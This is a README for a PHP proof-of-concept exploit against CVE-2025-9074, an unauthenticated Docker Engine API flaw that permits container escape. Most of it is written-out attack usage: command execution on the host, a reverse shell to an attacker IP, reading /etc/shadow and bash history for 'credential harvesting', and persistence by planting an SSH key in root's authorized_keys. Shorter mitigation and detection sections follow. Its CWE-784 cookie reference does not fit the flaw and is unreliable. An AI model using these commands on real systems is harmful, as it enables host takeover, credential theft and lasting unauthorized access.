c0gnit00/CVE-2025-9074

# CVE-2025-9074: Docker Engine API Unauthenticated RCE A proof-of-concept exploit for CVE-2025-9074, an unauthenticated Remote Code Execution vulnerability in Docker Engine API that allows privileged container escape and host system compromise. ## 🔴 Vulnerability Overview CVE-2025-9074 is a critical vulnerability in Docker Desktop that exposes the Docker Engine API without proper authentication or network isolation. This allows remote attackers to: - Execute arbitrary commands with elevated privileges - Escape container isolation and access the host filesystem - Establish reverse shell connections to attacker-controlled systems - Compromise the entire container host and underlying host OS ### Attack Vector - **Network Exposure**: Docker API exposed on network interfaces (typically port 2375/TCP) - **No Authentication**: The API accepts requests without authentication - **Privileged Containers**: Ability to create privileged containers with host filesystem access - **Bind Mounts**: Direct access to host filesystem via bind mount paths ## 📋 Requirements - PHP CLI (7.0+) - curl extension enabled in PHP - Network connectivity to exposed Docker API endpoint - Docker Desktop < 4.44.3 (vulnerable version) ### System Requirements for Target The vulnerability affects: - **Docker Desktop for Windows** < 4.44.3 - **Docker Desktop for Mac** < 4.44.3 - **Docker Engine** (when exposed without TLS) ## 🚀 Quick Start ### Installation git clone https://github.com/yourusername/CVE-2025-9074.git cd CVE-2025-9074 ### Basic Usage Execute a single command on the Docker host: php poc.php -u http://192.168.65.7:2375 -m cmd -c "whoami" ### Reverse Shell Establish an interactive reverse shell: # Terminal 1: Start listener nc -lvnp 4444 # Terminal 2: Run exploit php poc.php -u http://192.168.65.7:2375 -m reverse -l 10.10.14.36 -p 4444 ## 📖 Usage Guide ### Command Syntax php poc.php -u [options] ### Options | Option | Short | Required | Description | |--------|-------|----------|-------------| | `--url` | `-u` | ✅ Yes | Docker API URL (e.g., `http://1.2.3.4:2375`) | | `--mode` | `-m` | ❌ No | Execution mode: `cmd` or `reverse` (default: `cmd`) | | `--cmd` | `-c` | ⚠️ For cmd mode | Command to execute on target | | `--lhost` | `-l` | ⚠️ For reverse mode | Your IP address for callback | | `--lport` | `-p` | ❌ No | Your listening port (default: 4444) | | `--os` | — | ❌ No | Target OS: `linux`, `mac`, `windows` (default: `linux`) | | `--cleanup` | — | ❌ No | Remove container after execution | | `--help` | `-h` | ❌ No | Display help message | ### Mode: Command Execution Execute single commands on the target: # Simple command php poc.php -u http://192.168.65.7:2375 -m cmd -c "id" # Read files from host php poc.php -u http://192.168.65.7:2375 -m cmd -c "cat /mnt/hostfs/flag.txt" --cleanup # With cleanup php poc.php -u http://192.168.65.7:2375 -m cmd -c "whoami" --cleanup ### Mode: Reverse Shell Spawn an interactive shell with callback: php poc.php -u http://192.168.65.7:2375 -m reverse -l 192.168.1.100 -p 4444 ### OS-Specific Examples #### Linux Target php poc.php -u http://target:2375 -m cmd -c "cat /mnt/hostfs/etc/shadow" --os linux #### Windows Target php poc.php -u http://target:2375 -m cmd -c "dir C:\" --os windows #### macOS Target php poc.php -u http://target:2375 -m cmd -c "ls -la /mnt/hostfs/Users/" --os mac ## 🎯 Real-World Exploitation Scenarios ### 1. Reconnaissance # Enumerate host system php poc.php -u http://192.168.65.7:2375 -m cmd -c "uname -a" php poc.php -u http://192.168.65.7:2375 -m cmd -c "whoami" ### 2. Credential Harvesting # Extract sensitive files php poc.php -u http://192.168.65.7:2375 -m cmd -c "cat /mnt/hostfs/root/.bash_history" php poc.php -u http://192.168.65.7:2375 -m cmd -c "cat /mnt/hostfs/etc/passwd" ### 3. Persistence # Add SSH key php poc.php -u http://192.168.65.7:2375 -m cmd -c "mkdir -p /mnt/hostfs/root/.ssh && echo 'SSH_KEY' >> /mnt/hostfs/root/.ssh/authorized_keys" ### 4. Lateral Movement # Enumerate running containers and networks php poc.php -u http://192.168.65.7:2375 -m cmd -c "docker ps --all" ## 🔍 Technical Details ### Vulnerability Mechanism 1. **Exposed Docker Socket/API**: Docker API listens on `0.0.0.0:2375` without authentication 2. **Privileged Container Creation**: POC creates privileged containers via `/containers/create` 3. **Host Filesystem Binding**: Containers use bind mounts to access host filesystem: - **Linux**: `/:/mnt/hostfs` - **macOS**: `/:/mnt/hostfs` - **Windows**: `/mnt/host/c:/mnt/hostfs` 4. **Command Execution**: Commands execute with root/SYSTEM privileges inside the container 5. **Host Filesystem Access**: Direct read/write access to `/mnt/hostfs` paths ### Payload Flow ┌─────────────────────────────────────────────────────┐ │ poc.php (Your Machine) │ └────────────┬────────────────────────────────────────┘ │ HTTP REST API Call ▼ ┌─────────────────────────────────────────────────────┐ │ Docker API (Target Port 2375) [UNAUTHENTICATED] │ └────────────┬────────────────────────────────────────┘ │ Creates Container ▼ ┌─────────────────────────────────────────────────────┐ │ Privileged Alpine Container │ │ ├─ Full Root Access │ │ ├─ Bind Mount: /:/mnt/hostfs │ │ └─ Executes Attacker Command │ └────────────┬────────────────────────────────────────┘ │ Command Output ▼ ┌─────────────────────────────────────────────────────┐ │ Output Returned to Attacker │ └─────────────────────────────────────────────────────┘ ### Code Analysis - **Docker API Interaction**: Uses cURL for HTTP/1.1 REST API communication - **Docker Log Demuxing**: Properly handles Docker's multiplexed stream format - **Cross-Platform Support**: Adapts bind mount paths for Windows/Mac/Linux - **Timeout Handling**: 60-second timeout for long-running commands ## 🛡️ Mitigation ### Immediate Actions 1. **Upgrade Docker Desktop** # Update to version 4.44.3 or later 2. **Network Isolation** - Restrict Docker API port (2375) to localhost only - Use firewall rules to block external access - Disable Docker API socket exposure 3. **Enable TLS Authentication** # Configure Docker daemon with TLS certificates # In daemon.json: { "tlsverify": true, "tlscacert": "/etc/docker/ca.pem", "tlscert": "/etc/docker/server-cert.pem", "tlskey": "/etc/docker/server-key.pem" } 4. **Network Segmentation** - Run Docker Desktop on isolated networks - Implement zero-trust network access - Use VPNs for remote access ### Docker Desktop Settings - **Windows/Mac**: Disable "Expose daemon on tcp://localhost:2375" - Use Unix socket (`/var/run/docker.sock`) for local access only - Implement authentication via Docker Context with credentials ## 📊 Detection ### Network Detection # Scan for exposed Docker APIs nmap -p 2375,2376 -sV target_network # Check if port responds to Docker API curl -s http://target:2375/version ### Log Detection - Monitor Docker daemon logs for unusual API calls - Alert on privileged container creation - Track bind mount usage patterns ## ⚠️ Disclaimer **This tool is provided for authorized security testing and educational purposes only.** - Only use this POC on systems you own or have explicit permission to test - Unauthorized access to computer systems is illegal - Users assume full responsibility for their actions - This POC is for authorized penetration testing and vulnerability research ## 📝 References - [Docker Engine Security](https://docs.docker.com/engine/security/) - [Docker API Documentation](https://docs.docker.com/engine/api/) - [CVE-2025-9074 Details](https://nvd.nist.gov/vuln/detail/CVE-2025-9074) - [CWE-784: Reliance on Cookies without Proper Validation](https://cwe.mitre.org/data/definitions/784.html) ## 📄 License This project is licensed under the MIT License - see the LICENSE file for details. ## 👤 Author Security Researcher | Penetration Tester **Last Updated**: May 2025 | **Status**: Active Research

标签：ffuf